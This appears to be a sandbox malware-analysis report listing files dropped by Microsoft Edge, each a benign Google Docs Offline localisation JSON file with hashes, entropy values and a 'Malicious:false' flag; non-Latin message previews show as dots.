                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):914
                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):937
                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1337
                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2846
                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):934
                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):963
                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1320
                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):884
                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):980
                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1941
                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1969
                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1674
                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1063
                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1333
                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1263
                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1074
                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):879
                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
